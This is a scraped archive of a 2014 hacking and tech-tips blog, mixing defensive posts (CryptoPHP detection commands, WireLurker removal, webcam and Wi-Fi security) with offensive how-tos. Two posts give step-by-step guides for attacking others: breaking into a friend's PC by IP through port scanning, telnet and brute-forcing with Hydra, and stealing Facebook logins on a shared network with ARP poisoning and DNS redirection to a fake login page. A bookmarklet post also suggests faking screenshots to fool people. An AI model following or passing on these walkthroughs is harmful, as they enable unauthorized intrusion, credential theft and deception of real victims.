30/11/2014

How to Connect to Protected Wi-Fi Hotspots for Free Without Any Passwords


Depending on who you ask, internet connectivity should be a basic human right. With Google recently embarking on a project to provide internet capabilities to remote corners of the world using balloons and satellites while Facebook attempts to do the same with unmanned drones, the concept of free web access is steadily gaining steam. It's this train of thought that sparked the idea for a new crowd-sourced database of Wi-Fi access point passwords. The service uses an app called Instabridge to allow users to share passwords for Wi-Fi networks that they've connected to, then provides a map of all of these access points to other users.
Read Also:-Fern WiFi Cracker
Instabridge relies on user submissions to grow its list of connections, and thousands of network credentials have already been submitted. So if you're ready to join in the fun, I'll review the app in detail below.
Recommended Post:-How to Increase Wifi Signal Strength
1. Install Instabridge Instabridge- is available for free on the Google Play Store, but it is also available for Mac and Windows computers.
2. Set Up Your Preferences. When you first launch Instabridge, you'll have to go through a one-time setup process. First, tap I am new then review and Accept the Terms of Service.
Next, Instabridge will ask you to verify your phone number. This is done so that your friends will be able to find you and connect to your shared Wi-Fi networks, but it is not required. If you'd rather not share your phone number, hit Skip. Otherwise, hit OK.
If you opted to verify your phone number, a text message will be sent to your phone and Instabridge will automatically detect it. Once that has happened, a button will show up in the upper right-hand corner where you can hit Done.
Next, you'll be given a chance to review your settings. From here, you can set your phone to automatically connect to My own networks, Friend Networks (networks shared with you by friends), and Community Networks (networks shared by other users). The last two options help improve the Instabridge network and app, so leave them turned on and press the Done button up top.
3. Add Your Wi-Fi Networks. If you are connected to a Wi-Fi access point when setup has finished, the app will automatically ask if you would like to save and share the login credentials for that network. If you are not currently connected, you can get to this same interface at a later time from the app's main screen. Under the Networks you can connect to field, you will see your current Wi-Fi connection. Tap the Share or backup this hotspot button to begin. Enter your password on the following screen, then hit Next. From here, tap the Share with field then select who you'd like to share this Wi-Fi connection's password with. If it's a public access point, feel free to contribute to the cause and share the password with All Users. Otherwise, if this is your home network, it would be best to choose either Friends or Just me, no one else for security reasons. With the Friends option, you'll be given a chance to select which friends to share this connection information with. They will need to have the app installed on their device to connect to your network. You can view the amount of times that other users have connected to networks that you've shared by tapping the second tab from the app's home screen.
4. Connect to Free Wi-Fi Networks Instabridge makes it easy to discover free Wi-Fi connections in your area. From the app's main screen, simply tap the third tab (the one with the Earth icon) to begin. Grey dots represent public Wi-Fi connections that require payment or restrict access in some regard. Pink dots mark free, open Wi-Fi connections that are available for you to use. Tap any of the dots, and you'll be taken into Google Maps so that you can navigate to within range of the signal. When you're ready to connect to one of these networks, simply tap it from Networks you can connect to field on the app's main screen, and connection will occur automatically.
Love this article?
Share it with your friends on Facebook

28/11/2014

Hack Any Remote PC By IP Address Using Kali Linux


This is how we can get the IP address of the victims website. How about your friend’s PC? You can’t do www.yourfirend’ sname.com, can you? Finding your friend’s IP address is a little tough job, for you and tougher it is if he has dynamic IP address that keeps changing. But in our case, Finding friend’s/victim's IP address is as easy as A, B, C.
I'll show you one of the widely used method to detect IP address of your friend is by chatting with him or go through Find someone's IP address! in order to get IP address.
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply. If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily. Use Advanced Port Scanner to scan all open and venerable ports.
Read Also:-Hack Into Emails And Facebook Using Kali Linux

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > Add windows components. Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port].

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like Brutus, THC- Hydra In this way you’ll able to hack remove computer using only IP address.
Love this article?
Share it with your friends on Facebook

27/11/2014

Chat with Friends through Command Prompt (cmd)

Talk with other computers on your network.

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! All you need is your friends IP address and Command Prompt.
1. Open notepad then type:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
And then save as Messenger.bat and close the Notepad.
Read Also:-Shutdown Any Computer Remotely Using Command Prompt (CMD)
2. Go to control panel (make sure you are in Classic View) Click on administrative tools then click on services.
3. Now find the Messenger service in the list on the right, then open it. You'll see startup type which should be disabled, so click on that and select manual.
4. Now press the start button in the upper right hand corner of the window (not the green start button), and click apply.
5. Next, do the same procedure on the remote computer. Until this service is activated on that PC, or you won't be able to use this.
6. Now click on the messenger file you made. Since it is a batch file it will open with cmd (command prompt). It should show MESSENGER at the top and User: below that. Type the IP address of the remote computer after User:
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press Enter it should look like this:
MESSENGER
User: 56.108.104.102
Message: Hi
Now all you need to do is press Enter and start chatting.
Note: By default Microsoft disabled those features to further secure the system and among other things. net send is a command using a background service called messenger. This service is no longer working with Windows 8 nor in any latest OS versions.
Love this article?
Share it with your friends on Facebook

Top 17 Cyber Security And Privacy Tips


One of the easiest ways to help others is to simply share your knowledge. You don’t have to be in front of a classroom to teach. Every day there is an opportunity to educate someone about you know. At the end of this article, click share button.
Now let's explore!
With the growing variety of mobile devices, social networking sites, and online offers, it is important to protect yourself and your computer. We’ve compiled this list of 17 cyber security tips to help you take action now.
1. Do not use your full or partial Social Security number as a Personal Identification Number (PIN), user ID or password.
2. Make sure that your password is 8 or more characters and combines capitalized letters, numerals and symbols. Do not use the same user ID and password for your financial accounts as you do for other sites.
3. Consider a screen lock on your mobile device. Many mobile phones offer this option, as well as other customizable security settings, which can help keep your phone and information secure.
4. Do not use your mobile device to store sensitive personal information or bank account numbers.
5. Never respond to urgent email claiming to be from a bank or any company that requests your account information or personal details. Forward these emails to www.fbi.gov or call your local police immediately.
6. Limit the amount of personal information you provide on social networking sites. The more information you post, the easier it may be for a criminal to use that information to steal your identity, access your data, or commit other crimes.
7. Be cautious about messages you receive on social networking sites that contain links. Even links that look like they come from friends can sometimes be harmful or fraudulent attempting to gain control of your computer or steal your personal information. If you are suspicious, don’t click the link. Contact your friend or the business directly to verify the validity.
8. Keep your computer operating system and browser up to date with the latest and official software and security downloads. These may be called "patches" or "service packs" and should be installed as soon as possible.
9. Don’t open attachments or install free software from unknown sources, this may expose your computer and the information on it to unauthorized sources.
10. Install a comprehensive (official) Firewall/Antivirus/Anti-spyware software package on your computer. These software suites help detect and remove viruses and spyware, which can steal vital information.
11. When entering personal information into a website, make sure that the URL starts with https://. The “s” stands for secure and means that any information entered into the website is encrypted so that no one else can access it.
12. Use caution when connecting to unfamiliar or public Wi-Fi networks. These networks are sometimes referred to as zombie networks and can be the gateway to malware or viruses. As an extra safety measure, turn off your Wi-Fi or Bluetooth when not using it.
13. Add a DNS service to protect other devices. A DNS or domain name system service converts a web address (a series of letters) into a machine-readable IP address (a series of numbers). You're probably using your ISP's DNS service by default, but you can opt to subscribe to openDNS which redirect you if you attempt to access a malicious site.
14. When checking your bank account or paying a bill online use the incognito mode or private browsing and when you finish the browsing, clear browsing history, stored password and cache from browser settings.
Normally web browsers store information like your browsing history, images, videos, text and cookies in a cache. A cache stores information about a webpage that lets it load faster the next time you visit.
15. Use more than one email address one for social networking and other for your business. (Honestly, i've more than 23 email addresses).
16. Keep your account numbers, user names, and passwords secret. Don't share it with your boyfriend/girlfriend. At the time of breakup, they can hit your privacy by getting the help from outside sources.
17. Avoid tech support phone scams: Cybercriminals don't just send fraudulent email messages and set up fake websites. They might also call you on the telephone and claim to be from Microsoft. They might offer to help solve your computer problems or sell you a software license. Once they have access to your computer, they can trick you into installing malicious software that could capture sensitive data.
Share it with your friends on Facebook

26/11/2014

How to Clear/Remove CryptoPHP PHP Deadly Malware



What is CryptoPHP
CryptoPHP is a dangerous threat named by the Fox-IT’s security research team who detected it for the first time in the year of 2013. (Read recent news about cryptophp). According to them the threat uses the backdoor themes and plug-ins which uses in the CMS (content management system) to attack the web servers. This is so because today many of the web administrators are using CMS rather than the raw HTML for building their websites. The popular CMS like Word press, Joomla and Drupal are under the attack as they are using the pirated themes and plug-ins on their websites. Once if you have installed these backdoor malicious themes and plug-ins on your website, the malware can be controlled by the attackers by manually or via command and control (CC) and email communications. From there on-wards they will use your website for illegal search optimization, which is known as Blackhat SEO.
Recommend Post:-How To Detect And Remove WireLurker Malware From iPhone, iPad
CryptoPHP carries several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down. The PHPCrypto malware can update itself, inject content into the compromised sites it sits on and perform several other functions. Fox IT has a very in-depth whitepaper available Operators of CryptoPHP currently abuse the backdoor for illegal search engine optimization, also known as Blackhat SEO. The backdoor is a well developed piece of code and dynamic in its use. The capabilities of the CryptoPHP backdoor include:
*. Integration into popular content management systems like WordPress, Drupal and Joomla.
*. Public key encryption for communication between the compromised server and the command and control (C2) server.
*. An extensive infrastructure in terms of C2 domains and IP’s.
*. Backup mechanisms in place against C2 domain takedowns in the form of email communication.
*. Manual control of the backdoor besides the C2 communication.
*. Remote updating of the list of C2 servers.
*. Ability to update itself.
From Last few days Abuseat/CBL have suddenly built this into their database. Now they are blocking server IP which contains CryptoPHP PHP malware.

How to Detect and Clean CryptoPHP PHP Malware
It seems attacker is injecting malware using social.png file. Here is a simple command that can really find all such files and print first 80 characters from this file just to confirm it’s content.
find/home/ -name "social*.png" -exec grep -E -o 'php.{0,80}' {} \; -print
You need to delete those files and examine such user account, Because just deleting this file will not actually solve anything. Also you can run following command.
find -L /home -type f -name '*.png' -print0 | xargs -0 file | grep "PHP script" > /root/crypto.txt
This will check all png files, you can expand it to check all jpg and gif files as well. The output will contain a list of files that are actually php scripts. Also I’d suggest to run maldet or clamav scan on your server to find out the CryptoPHP PHP malware. Make sure to update both clamav and maldet prior to scanning.
freshclam
maldet -u
Also submit IP removal request on CBL.
Important Tips:
*. Do not install web templates/themes from unknown website.
*. Before file installation, scan the whole document on well known website scanners like VirusTotal, Metascan Online and so on.
*. If you are a web developer, expand the whole file and look for unknown coding/characters. If unknown codes found, remove them in order to hit the code maker.
Love this article?
Share it with your friends on Facebook

25/11/2014

How to Remove AdFoc.us pop up advertisements


AdFoc.us is an adware program that generates advertisements and hijacks your browser search settings, then redirects your searches to affiliated advertisers. AdFoc.us attacks Google Chrome, Internet Explorer and FireFox. When you place a search, AdFoc.us intercepts that search and diverts it to its own advertising network, which in most cases offers search results that are not necessarily best fit.
Read Also:-How To Detect And Remove WireLurker Malware From iPhone, iPad
In other cases, AdFoc.us Ads either generate popups or double underlined words and phrases on your search result pages. When you hover over the underlined word, a popup appears in the upper left corner.
AdFoc.us Symptoms include:
*. Your default search engine is switched to AdFoc.us
*. Searches are redirected.
*. A new toolbar appears.
*. Your browser start page may change.
*. You see AdFoc.us ads on pages you visit
*. You see AdFoc.us pop up advertisements
Detected AdFoc.us Entries:
*. C:\ProgramData\AdFoc.us
*. C:\Program Files\AdFoc.us
In order to remove AdFoc.us Ads, click here to scan your PC (the app offers a free scan (not removal). However, you can remove this from program files in your computer or uninstall it from Control panel > Add remove programs for more help visite Browser Resetting Best of all. We would appreciate your feedback, so please feel free to drop us a small note (by clicking on Contact Us above) telling us how the removal went.
Love this article?
Share it with your friends on Facebook

Edit Any Webpage Directly From Your Web Browser


You surf a lot of websites on internet. Sometime you want your name to appear on the websites to show your friends or just for fun. So, if you wants to edit a website’s page you are just watching then, there is a simple Javascript code which lets you to directly edit the opened webpage at your browser.
Read Also:-Shutdown Any Computer Remotely Using Command Prompt (CMD)
Using this trick you can change the details according to your wish. this trick helps you to edit all the text part of that website so that you can put your content there. You can edit Google or even Facebook for that matter right in your browser and that too without requiring any technical know-how or getting deep into hacking and cracking. You can use it for anything like showing wrong traffic stats or for fooling people by showing that someone said something about them on Facebook or Twitter. It depends only on your creativity. But I would advise you to stay ethical and use it for entertainment purposes only.
Note: Many websites like Facebook, Twitter etc. runs on HTTPS So the trick might not be working there. However, you can browse the link from Proxy Servers and then this JavaScript Trick will work.
Mozilla Firefox does not support this. If you use Firefox, you can use the bookmarklets If you use Google Chrome and the code does not seem to work, precede it with javascript:>
To use this trick, all you need to do is just copy the code given below and paste it in your address bar after you have opened the website you wish to edit and start editing.
javascript:document.body.contentEditable%20=%20'true';%20document.designMode='on';%20void%200
You can capture a screenshot by pressing the Print Screen key or by using the Snipping Tool if you use Windows 7 or Windows Vista. If you wish to again make the website non-editable to give a more authentic look, copy and paste the code given below in the address bar after you are done editing.
javascript:document.body.contentEditable%20=%20'false';%20document.designMode='off';%20void%200
Or, alternatively you can use the following bookmarklets by dragging them to your Bookmarks bar.
1. Edit this Website
2. Done Editing The editing that you do will however be temporary as it is not server-sided. You can also save the modified website through your browser by File > Save.
This (Bookmarks) works on all common web browsers including Chrome, Firefox Opera and Internet Explorer.
Love this article?
Share it with your friends on Facebook

22/11/2014

Find your computer's Gender


My girlfriend (S. Pandey) always complains that I love my computer more than her. And I always reply, “Baby, its only a machine”. On that she often comments that if ever machines have gender my computer would be a girl. Turns out, she is right. Today, i decided to share this brilliant trick to let you know whether your computer is a male or a female?
There is a way you can find out your computer's gender. Simple follow the instructions below:
1. Open your notepad
2. Type or copy the codes written below:
paste:CreateObject(“SAPI.SpVoice”).Speak”baby I love you”
3. Save as computer_gender.vbs 4. Run the file.
Now, if you hear a male voice its a boy and if you hear a female voice, its a girl.
Note: Type above mentioned carefully otherwise, you hear nothing.
Don’t forget to tell me what is your computer, a boy, a girl or a bitch. Smiley
Honestly, mine is a girl.
Read Also:- Make your Computer Welcome You
Make your Computer Talk.
On a serious note, this depends upon the voice you have selected in Microsoft Text to Speech options.
Love this article?
Share it with your friends on Facebook

Make your Computer Talk


Intelligent machines capable of speech are often the stuff of futuristic sci-fi movies, but you can turn any computer into a chatty Cathy. Even though we aren’t yet at the stage with computers where they can interact with us like people, there are a few tools and simple scripts we can write to make any computer that is running Windows speak to us. Well, if you wish to know how to do this, then keep scrolling. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.
Read Also:- Make your Computer Welcome You
To create one such talk script, follow the steps given below:
Step 1. Open Notepad.
Step 1. Copy and paste the exact code given below.
Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set
Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
Step 3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
Step 4. Double click on the saved file, a window will open. Enter some text in enter text column and click OK.
Now your Computer will speak/talk what you typed in Step 4.

Windows Compatibility

This VBS file can be executed on all versions of Windows including Windows XP,Windows Vista, Windows 7 and Windows 8.
Personal Experience: I personally showed this trick to many of my friends at LUMS when i was doing Ph.D in mathematics and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.
Love this article?
Share it with your friends on Facebook

Make your Computer Welcome You


If you use to watch Hollywood Sci -Fi movies, you must saw a scene in which the computer welcomes the user by speaking his name in the computerized voice.This looks quite impressive, but You can easily make your Windows PC to speak a welcome greeting note for you at windows start up.This is very simple and easy to implement trick but when you start your computer in front of your friends or anybody, they will be wondered by listening your name.So If you want to impress your friends with your technical and programming skills,you must try this.This is very cool and interesting trick to impress someone. This article describes exactly how you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username." (i make my computer "Welcome to your PC, Johnelwin").
Read Also:- Make your Computer Talk
Make Windows Greet you with a Custom Voice Message at Startup To use this trick, follow the instructions given below:
1. Click on Start. Navigate to All Programs, Accessories and Notepad.
2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC,
Username"
Set
speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3.Replace User name with your own name.
4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup In Windows XP and to C:\Users\{User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup In Windows 8 , Windows 7 and Windows Vista if C: is your System drive. App Data is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
7. Paste the file. Now when the next time you start your computer, Windows will welcome you in its own computerized voice.
Note: For best results, it is recommended to change sound scheme to No Sounds. You can change the sound scheme to No Sounds by following the steps given below:
1. Go to Control Panel.
2. Then click on Switch to Classic View.
3. Then Click on Sounds and Audio Devices.
2. Then Click on the Sounds Tab.
5. Select No Sounds from the Sound Scheme option.
6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
7. Click on OK.
Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Love this article?
Share it with your friends on Facebook

21/11/2014

How To Detect And Remove WireLurker Malware From iPhone, iPad



What is WireLurker?
The WireLurker malware, known to infect OS X powered Macs and iOS devices has stirred up the Apple community. Malware that successfully infects Apple products is rare. On the Mac that was because criminals tended to go after the much bigger Windows market, while on the iPhone and iPad, Apple's App Store security has been exemplary. Known to exist as a threat in China

How do I detect WireLurker?

The WireLurker malware installs a number of files on your OS X system, which set it up to detect any iOS systems you attach by a USB cable, and then install malware into that iOS device. If you have any of these files on your Mac, then you likely have the malware installed. These have been outlined by Palo Alto Networks, the company that discovered the malware, and for the current variant of the malware include the following files:
1. A file called run.sh in the Macintosh HD > Users > Shared folder
2. Any of the following files in the Mac into sh HD > Library > Launch Daemons folder
com.apple.machook_damon.plist
com.apple.globalupdate.plist
3. Any of the following files in the Macintosh HD > System > Library > Launch Daemons folder
com.apple.appstore.plughelper.plist
com.apple.MailServiceAgentHelper.plist
com.apple.systemkeychain-helper.plist
4. In addition, the following files and folders will be in the hidden usr/bin directory, which can be opened by pressing Shift-Command-G in the Finder and then then entering “/usr/bin” in the path field that shows up:
globalupdate/usr/local/machook/WatchProcitunesupdate
com.apple.MailServiceAgentHelper
If you see any or all of these files in your Mac’s hard drive, then your Mac has likely been compromised.

How to protect against WireLurker?
The first step Mac users can take to protect themselves is to not download or run any applications that come from third-party app stores. Go to OS X's System Preferences, click "Security and Privacy," and then select "Allow apps downloaded from Mac App Store (or Mac App Store and identified developers)." This will prevent the Mac from installing any software unauthorized by Apple. Next, install a decent OS X antivirus application. Some of the best ones are free, so you have nothing to lose. Be sure to keep all the software on all your iOS and OS X devices up-to-date. Apple is quite responsive about patching vulnerabilities. Never connect your iPhone to an unknown or untrusted computer, whether it's a Mac or a PC, or even an untrusted charger, chargers can actually be mini-computers.

How do I remove WireLurker?
Fortunately, WireLurker appears to be easy to remove. All you have to do is delete the related files from the affected Macs or iOS devices.
For Jailbroken Users
Step 1: Install a File manager such as iFile or Filza. You could also use SSH capabilities to gain access to your iDevice from your Mac or PC.
Step 2: Navigate to > Library > MobileSubstrate > DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib and if found, you know your device is infected. However, if no such file exists, breathe a sigh of relief. Normally one would perceive deleting this file as a removal of the threat that WireLurker is, but it is recommended that you do a complete restore of your iOS device from iTunes.
For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, considering Apple has placed in appropriate security measures, but, there’s a possibility that you conceived the malware a while back before the Cupertino giant took action. And if you believe that you’re infected, and don’t happen to be jailbroken, then read on.
Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile and if you find one delete it.
Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed. Again, it is highly recommended that you do a complete restore of your iOS device from iTunes till a more effective and sure fire solution comes up.

Webcam Safety Tips: Are You Being Watched Through Your Webcam?


Webcam Safety Tips

A few clicks of the mouse, and your webcam is activated and ready to be used. But have you considered the possibility that someone else could be watching you through your own webcam?
Read Also:- How to use your phone as a wireless keyboard and mouse for your PC
Well, strictly speaking, if your computer is secure and uninfected, can’t be accessed remotely, and has strong password, locked case, tied up with string to prevent people from accessing it when unattended, then no worries, you’re good.

How Webcams Get Hacked
Hackers utilize a type of software called Remote access tool (RAT) that allows them to remotely access a computer as if they were physically there. Though RATs were designed for legal purposes, like allowing a technician to remotely access a user’s computer to troubleshoot problems without having to physically be there, hackers exploit this software for their own benefit.
Typically, a hacker lures an unsuspecting user into clicking on a link, opening a picture or email attachment, visiting a specific website, or downloading some software. After the user falls for one of these, the RAT software is secretly installed onto the user’s computer. The hacker now has remote access to the user’s computer.

Preventing Your Webcam from Being Hacked
Many articles recommend covering the lens of the webcam with a piece of paper to prevent hackers from spying on you. But doing that alone is brushing the real problem under a rug. Having your webcam hacked means your PC has been compromised by some malware, and you need to take immediate action to get rid of it. Here are some easy things you can do that can prevent your computer from being compromised in the first place.

Don’t Click on Unknown Links
Hackers lure victims into installing RAT software onto their PC by disguising links, pictures, or email attachments as something desirable, such as free music, movies, or desktop wallpapers. Be wary of suspicious websites that offer similar items. Also be cautious about clicking on shortened links you may find on social media sites.

Equip your computer with an antivirus and two-way firewall
Having an antivirus and two-way firewallis minimum security any PC should be equipped with. An up-to-date and active antivirus helps to detect and remove malware from infecting your computer. A two-way firewall monitors inbound and outbound traffic to-and-from your computer.

Be cautious of tech support offering remote assistance
Hackers may physically contact you by claiming there are problems with your computer. They’ll try to persuade you to install a program that allows them remote access to your computer, so that they can fix the problem. Simply ignore calls from those who claim they are tech support.

Secure your wireless connection
A hacker can easily hack into unsecure Wi-Fi networks with a laptop, antenna, and widely available software. Don’t make it easy for them. Secure your wireless connection with a strong and complex password.

Disable Windows Remote Access
Though most RATs deployed by malware are custom tools, disabling Windows Remote Assistance and Remote Desktop is one thing you can do to prevent hackers from remotely accessing your computer.
Love this article?
Share it with your friends on Facebook

20/11/2014

How Hackers Hack Bank Accounts and Personal Information

Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays.
Recommend Post What Is Keylogger And How To Be Safe From Keyloggers

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL (Secured Sockets Layer) connection and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.
Below example will illustrate you how powerful the encryption method is:
* . 40 bit encryption, means there are 2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
* . 128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption. That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key. That's a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it's all is useless to you once your system has been compromised or hacked. Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information Some of them are:
1. Phishing
Read Also How to create fake or Phishing web page for Gmail
2. Trojans
3. Session Hijacking
Warning: This blog contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational, public awareness and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this blog nor the author(s) of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions.
We http://deadlyuniversityspy.blogspot.com/ are providing a lot of hacking tutorials, methods to crack passwords and other similar stuffs in order to develop hackers attitude to learn self defence from Computer Criminals attack and to detect the ways in which hackers can infiltrate your system.
Love this article?
Share it with your friends on Facebook

17/11/2014

Hacking Facebook Using Man in the Middle Attack

Before i take you to the main point, let's understand Man in the Middle Attack.

So What is Man in the Middle Attack?
An attack where a user gets between the sender and receiver of information and sniffs any information being sent. In some cases, users may be sending unencrypted data, which means the man-in-the-middle (MITM) can obtain any unencrypted information. In other cases, a user may be able to obtain information from the attack, but have to unencrypt the information before it can be read. In the picture below is an example of how a man-in-the-middle attack works. The attacker intercepts some or all traffic coming from the computer, collects the data, and then forwards it to the destination the user was originally intending to visit.

Read Also Seven Most Common Password Cracking Methods And Their Countermeasures
In this tutorial Hacking Facebook Using Man in the Middle Attack I will demonstrate how to hack Facebook using MITM (Man in the Middle). This attack usually happen inside a Local Area Network (LAN) in office, internet cafe, apartment and so on. Below is the step by step guide how MITM work, and how it can be happen to do hacking a Facebook account. In this guide, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table. For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below are some tools you need to download.
1. XAMPP–APACHE PHP MySQL
2. Cain & Abel (We use it for Man in the Middle Attack).
3. Facebook Offline Page (I have nulled the code, so this script will not contact Facebook when victim accessed fake Facebook page Download Facebook Offline Page
Update: Replace your index.php and login.php using following files. Download Here

Step by step Hacking Facebook Using Man in the Middle Attack
Attacker IP Address: XXX.XXX.XXX.XXX
Victim IP Address: XXX.XXX.XXX.62
Fake Web Server: XXX.XXX.XXX.XXX
Note: For Security reasons, i can't type my IP Address So, you need to replace the X with your own IP and your victim's as well.
I assume you’re in a Local Area Network now.
1. Install the XAMPP and run the APACHE and MySQL service
2. Extract the fb.rar and copy the content to C:\xampp\htdocs
3. Check the fake web server by open it in a web browser and type http://localhost/
4. Install Cain & Abel and do the APR (ARP Poisoning Routing), just see the step by step how to below Click the start/stop sniffer Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface. Go to the Sniffer tab and then click the Select "All hosts in my subnet" and Click OK.
You will see the other people in your network, but your target is XXX.XXX.XXX.62 After we got all of the information, click at the bottom of application the APR tab. Click the button, and follow the instruction below.
When you finish, now the next step is preparing to redirect thefacebook.com page to the fake web server. Click "APRDNS" and click to add the new redirecting rule. When everything is finish, just click OK Then the next step is to activate the APR by clicking the Start/Stop APR button.
5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim open http://www.facebook.com
6. But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker.
Love this article?
Share it with your friends on Facebook

16/11/2014

How to Encrypt Your Wireless Network


If you have Cable, DSL, or some other form of high-speed Internet, chances are, you've purchased a wireless-capable router so that you can connect to the Internet via your notebook PC, smartphone, or any other wireless-enabled device you have in your home. Many of you out there may be using a wireless router that is 5 years old or more. These devices tend to be set up and forgotten for the most part. Once it's set up, it just sort of does its thing, save for the occasional glitch that requires you to reboot it. When you first set up your wireless router did you turn on encryption so that a password was required to access your wireless network? Maybe you did, maybe you didn't.
Here's a quick way to find out if your wireless network is using encryption:
1. Open your smartphone's wireless network settings (check your smartphone's help manual for details).
2. Look for your wireless network's SSID (network name) in the list of available networks.
3. Check to see if your wireless network has a padlock icon next to it, if it does, then you are using at least basic encryption. Although you may have encryption turned on, you may be using an out dated and easily hacked form of wireless encryption so keep reading.
4. Check to see if your wireless network configuration tells you what type of wireless security is being used to protect your network. You will likely see either WEP, WPA, WPA2, or something similar. If you see anything besides WPA2, you will need to change the encryption settings on your wireless router or possibly upgrade its firmware, or buy a new wireless router if your current one is too old to support an upgrade to WPA2.
Read Also How to Hack Ethernet ADSL Router

Why You Need Encryption and Why WEP Encryption is Weak
If your wireless network is wide open with no encryption enabled, you are practically inviting neighbors and other free loaders to steal the bandwidth that you're paying good money for. Maybe you're the generous type, but if you are experiencing slow Internet speeds, it might be because you have a bunch of folks leeching off your wireless network. Just a few years ago, Wired Equivalent Privacy (WEP) was the standard for securing wireless networks. WEP was eventually cracked and is now easily bypassed by even the most novice hacker thanks to cracking tools available on the Internet. After WEP came Wi-Fi Protected Access (WPA). WPA too had flaws and was replaced by WPA2. WPA2 isn't perfect, but it is currently the best available offering for protecting home-based wireless networks. If you set up your Wi-Fi router many years ago then you could be using one of the old hackable encryption schemes such as WEP. You should consider changing to WPA2.

How To Enable WPA2 Encryption on Wireless Router
1. Log into your wireless router's administrator console. This is usually done by opening a browser window and typing in the address of your wireless router (usually http://192.168.0.1, http://192.168.1.1, http://10.0.0.1, or something similar). You will then be prompted for the admin name and password.
2. Locate the "Wireless Security" or "Wireless Network" settings page.
3. Look for the Wireless Encryption Type setting and change it to WPA2-PSK (you may see a WPA2-Enterprise settings. The enterprise version of WPA2 is intended more for corporate-type environments and requires a much more complicated set up process). If you don't see WPA2 as an option, then you may have to either upgrade your wireless router's firmware to add the capability (check your router manufacturer's website for details) or, if your router is too old to be upgraded via firmware, you may have to purchase a new wireless router that supports WPA2.
4. Create a strong wireless network name (SSID) coupled with a strong wireless network password (Pre-shared Key).
5. Click "Save" and "Apply". The wireless router may have to reboot for the settings to take effect.
6. Reconnect all your wireless devices by selecting the wireless network name and entering in the new password on each device. You should periodically check your router manufacturer's website for firmware updates that they might release to fix security vulnerabilities associated with your router. The updated firmware may also contain new security features as well.
Love this article?
Share it with your friends on Facebook

15/11/2014

How to Prevent Browser Hijacking



What is Browser Hijacking?
Having your browser hijacked is basically just what it sounds like. Browser hijacking is when a software program created by either a malicious hacker, an unscrupulous advertiser, or other person interested in making money from an affiliate program, forcibly redirects your browser to a location that will likely produce some kind of monetary gain for the perpetrator (through increased traffic), while you receive no relevant results and are prevented from getting to your intended destination. The software usually makes it on to your computer in one of two ways: Either a hacker tricks you into installing it via an email or a malicious link, or it's bundled with some legitimate software by a software developer who uses it as a additional source of revenue. If you've ever had your web browser hijacked, then you know what a pain it can be to deal with the aftermath of removing the browser hijacking software and resetting your browser so that it doesn't go back to the sites that the hijacking software pointed to. So How Can You Prevent Your Browser From Getting Hijacked:
